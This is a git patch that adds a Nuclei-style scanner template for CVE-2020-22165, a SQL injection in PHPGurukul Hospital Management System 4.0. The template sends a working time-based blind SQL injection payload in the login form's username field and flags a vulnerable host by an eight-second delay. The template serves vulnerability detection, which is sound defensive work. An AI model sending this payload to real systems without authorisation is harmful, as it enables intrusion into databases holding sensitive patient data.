From 2fb20ee36aac9947d948d7bed951ed3eebd0b3a5 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 9 Oct 2025 15:32:38 +0530
Subject: [PATCH] Create CVE-2020-22165.yaml

---
 http/cves/2020/CVE-2020-22165.yaml | 62 ++++++++++++++++++++++++++++++
 1 file changed, 62 insertions(+)
 create mode 100644 http/cves/2020/CVE-2020-22165.yaml

diff --git a/http/cves/2020/CVE-2020-22165.yaml b/http/cves/2020/CVE-2020-22165.yaml
new file mode 100644
index 00000000000..d3b6167a36e
--- /dev/null
+++ b/http/cves/2020/CVE-2020-22165.yaml
@@ -0,0 +1,62 @@
+id: CVE-2020-22165
+
+info:
+  name: PHPGurukul Hospital Management System 4.0 - SQL Injection
+  author: ritikchaddha
+  severity: high
+  description: |
+    PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in \hms\user-login.php. Remote unauthenticated users can exploit the vulnerability to obtain sensitive database information.
+  impact: |
+    Successful exploitation allows attackers to access sensitive data from the database, potentially leading to data leakage and further compromise of the application.
+  remediation: |
+    Upgrade to the latest version or apply proper input sanitization and parameterized queries to mitigate this vulnerability.
+  reference:
+    - https://github.com/itodaro/PHPGurukul_Hospital_Management_System4.0_cve
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-22165
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2020-22165
+    cwe-id: CWE-89
+    cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: phpgurukul
+    product: hospital_management_system
+    fofa-query: title="Hospital Management System" && body="HMS"
+  tags: cve2020,cve,hms,cms,sqli,phpgurukul
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        @timeout: 30s
+        POST /hms/user-login.php HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "Hospital Management")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        @timeout: 30s
+        POST /hms/user-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=a' and 1=2 union select 1,2,if(substring((select user() limit 0,1),1,1)='r',sleep(8),1),4,5,6,7,8,9#&password=asfsafafsafsaf&submit=1&submit=
+
+    stop-at-first-match: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=8'
+          - 'status_code == 200'
+        condition: and